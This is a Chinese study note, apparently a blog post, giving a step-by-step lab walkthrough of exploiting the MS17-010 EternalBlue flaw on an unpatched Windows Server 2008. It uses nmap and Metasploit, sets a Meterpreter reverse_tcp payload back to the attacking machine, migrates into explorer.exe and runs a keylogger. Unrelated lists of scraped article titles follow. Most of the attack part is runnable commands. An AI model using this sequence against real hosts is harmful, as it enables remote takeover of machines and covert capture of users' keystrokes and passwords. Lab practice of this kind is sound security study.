环境:        攻击机:192.168.200.101   //kali Linux 2020

靶机:192.168.200.103    (未打MS17-010补丁windowsServices2008.x64)

1:msfconsole                                                                         //进入metaploit

2:nmap -sV 192.168.200.103(检查445端口是否开放)        //使用nmap探测主机信息

3:利用msf的auxiliary模块进行漏洞验证

search ms17-010                                                                         //查询MS17-010永恒之蓝漏洞信息

use  auxiliary/scanner/smb/smb_ms17_010                                 //使用辅助扫描smb,是否存在永恒之蓝漏洞

set  rhost  192.168.200.103                                                         //设置目标IP

set  rport   445                                                                         //设置目标端口

run                                                                                                 //开始扫描

4:设置攻击目标、端口、本机

use  exploit/windows/smb/ms17_010_eternalblue                      //利用永恒之蓝漏洞

set  rhost  192.168.200.103                                                      //设置目标IP

set  rport   445                                                                     //设置目标端口

set lhost 192.168.200.101                                                     //设置kali linux IP地址

set  payload   windows/x64/meterpreter/reverse_tcp             //使用reverse_tcp攻击荷载

show options                                                                             //查看是否设置完成

run                                                                                             //开始攻击

若成功则拿到目标机的shell

6:输入ps查看进程

#找到explorer.exe进程(记住PID)

PID   PPID  Name               Arch  Session  User                          Path

---   ----  ----               ----  -------  ----                          ----

1996  1980  explorer.exe       x86   0        VIOLET\violetevergarden       C:\WINDOWS\Explorer.EXE

7:meterpreter > migrate 1996                                         //迁移会话

8:run post/windows/capture/keylog_recorder                //进行键盘记录

#键盘记录完成后会生成一个文件,文件路径会在攻击完成后显示,注意,键盘记录需要按ctel+c结束。

————有些小伙伴可能在拿到shell后可能会有乱码这里给予解决方法:输入命令:chcp 65001 即可

linux 键盘记录,学习笔记 kali linux 关于MS17-101漏洞攻击与键盘记录相关推荐

  1. linux空洞目录,学习笔记:linux之文件空洞

    文件空洞linux 咱们知道lseek()系统调用能够改变文件的偏移量,但若是程序调用使得文件偏移量跨越了文件结尾,而后再执行I/O操做,将会发生什么状况? read()调用将会返回0,表示文件结尾. ...

  2. 鸟哥linux群,【鸟哥的linux私房菜-学习笔记】linux的帐号与群组

    linux的帐号与群组 使用者标识符: UID 与 GID ID 与账号的对应就在 /etc/passwd 当中: 计算机只认得ID(即数字),并不能区别账号: 每个登陆的使用者至少都会取得两个 ID ...

  3. KALI LINUX渗透测试学习笔记

    KALI LINUX渗透测试学习笔记 (苑房弘主讲) 第1章 课程介绍 任务1:Kali Linux渗透测试介绍.exe 安全问题的根源: 分层思想 只求功能实现 最大的威胁是人 渗透测试: 尝试挫败 ...

  4. kali linux 渗透测试学习笔记——被动信息收集

    kali linux 渗透测试学习笔记--linux 被动信息收集 被动信息收集 被动信息收集 公开渠道可获得的信息 已公开的信息,通过互联网等渠道去获得 与目标系统不产生直接交互 不对目标访问,扫描 ...

  5. Linux中常用的文件目录,Linux学习笔记2——Linux中常用文件目录操作命令

    ls 显示文件和目录列表 -l 列出文件的详细信息 -a 列出当前目录所有文件,包含隐藏文件 mkdir 创建目录 -p 父目录不存在情况下先生成父目录 cd 切换目录 touch 生成一个空文件 e ...

  6. Linux学习笔记之——Linux系统内部相关介绍

    Linux学习笔记之--Linux系统内部相关介绍 摘要:主要记录一些比较有用的能够帮助理解和使用Linux的知识.比如一些相关概念.没兴趣的看看就好.知道有这么个东西.注意事项.和一些常用目录的作用 ...

  7. 郝健: Linux内存管理学习笔记-第5节课

    前序文章: 郝健: Linux内存管理学习笔记-第1节课 郝健: Linux内存管理学习笔记-第2节课 郝健: Linux内存管理学习笔记-第3节课 郝健: Linux内存管理学习笔记-第4节课 摘要 ...

  8. 郝健: Linux内存管理学习笔记-第4节课

    前序文章: 郝健: Linux内存管理学习笔记-第1节课 郝健: Linux内存管理学习笔记-第2节课 郝健: Linux内存管理学习笔记-第3节课 摘要 page cache free命令的详细解释 ...

  9. Linux NVMe Driver学习笔记之8:IO SQ/CQ的创建过程

    这篇文章紧接上回分解,在nvme_probe函数的最后一步调用nvme_reset_work进行reset操作,nvme_reset_work的主要工作可以概括如下几个步骤: 进入nvme_reset ...

最新文章

  1. easyui validate 后 使用ajax提交
  2. IOS8的新特性:简洁易用的毛玻璃效果
  3. MySQL为关联表添加数据
  4. 从零开始学计算机组装与维修技术,从新手到高手:电脑组装、维护与故障排除...
  5. Storm程序的并发机制原理总结
  6. vue+layui获取CheckBox的值
  7. NYOJ-寻找最大数(贪心)
  8. 记华为综合面试(IT集成类)
  9. Ubuntu挂载U盘相关
  10. zipfile.BadZipFile: File is not a zip file
  11. 20170908-构建之法:现代软件工程-阅读笔记
  12. 8种最差的预测建模技术,你认同吗?
  13. CCIELAB之路由重分布之单点双向重分布的汇总路由反馈
  14. JSP项目《教师年终个人成果统计系统的设计与应用》实战(一)——密码加密算法...
  15. 2021-08-22 过滤器实现登录权限拦截
  16. python保存数组到txt_np.savetxt()——将array保存到txt文件,并保持原格式
  17. 【Android TV 开发】-->开发汇总
  18. Python配置OpenCV
  19. 【Winhex】狂派入门: Winhex的简单使用教程
  20. Raspberry Pi Zero W 安装配置

热门文章

  1. 计算机信息安全专业留学,2021美国信息安全专业排名Top50大学!
  2. c++ cout头文件_C/C++知识分享:C++常用内置函数你会几个,使用过几次呢?
  3. python语句x 3 3执行_Python 3.x 学习笔记--杂
  4. centos mysql php tomcat_centos 一键部署安装nginx,mysql,php,apache,tomcat,redis等包合集
  5. 【若依(ruoyi)】工作流操作SQL
  6. 【linux】kill命令模板
  7. @RequestBody注解分析
  8. #地形剖面图_高中地理——每日讲1题(地形剖面图、河流水的补给、河流丁坝)...
  9. java 文件保存目录结构_java web 实现文件夹上传(保留目录结构)
  10. xmind快捷键_XMind思维导图软件最全面的使用教程!